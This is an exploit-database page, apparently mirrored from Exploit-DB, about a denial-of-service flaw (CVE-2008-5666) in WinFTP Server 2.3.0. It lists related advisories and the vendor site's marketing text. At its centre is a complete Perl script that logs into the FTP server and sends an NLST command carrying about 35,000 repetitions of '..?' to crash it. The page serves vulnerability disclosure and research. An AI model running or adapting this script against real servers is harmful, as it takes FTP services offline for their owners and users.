Lucene search
+L

WinFTP Server 2.3.0 - 'NLST' Denial of Service

🗓️ 26 Sep 2008 00:00:00Reported by Julien BedardType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

WinFTP Server 2.3.0 denial of service via 'NLST' comman

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5666
26 Sep 200800:00
circl
checkpoint_advisories
Check Point Advisories
WinFTP Server NLST Command Denial of Service (CVE-2008-5666)
1 Dec 201400:00
checkpoint_advisories
cve
CVE
CVE-2008-5666
18 Dec 200821:00
cve
cvelist
Cvelist
CVE-2008-5666
18 Dec 200821:00
cvelist
exploitdb
Exploit DB
WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service
9 Oct 200800:00
exploitdb
metasploit
Metasploit
WinFTP 2.3.0 NLST Denial of Service
30 Sep 200823:28
metasploit
nvd
NVD
CVE-2008-5666
19 Dec 200801:52
nvd
openvas
OpenVAS
WinFTP Server <= 2.3.0 PASV Command DoS Vulnerability
26 Dec 200800:00
openvas
openvas
OpenVAS
WinFTP Server PASV Command Denial of Service Vulnerability
26 Dec 200800:00
openvas
packetstorm
Packet Storm
WinFTP 2.3.0 NLST Denial of Service
31 Aug 202400:00
packetstorm
Rows per page
#!/usr/bin/perl
############
#
# Simple Dos Crap for the winftpsrv.exe v.2.3.0
#  by Julien Bedard
#
####################################

use Net::FTP;
$wftpsrvaddr = "255.255.255.255";
$overflow = "..?" x 35000;
$user = "test";
$pass = "test";
$port = 21;

$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->nlst($overflow);
$ftp->quit;

# milw0rm.com [2008-09-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
EPSS0.20591
32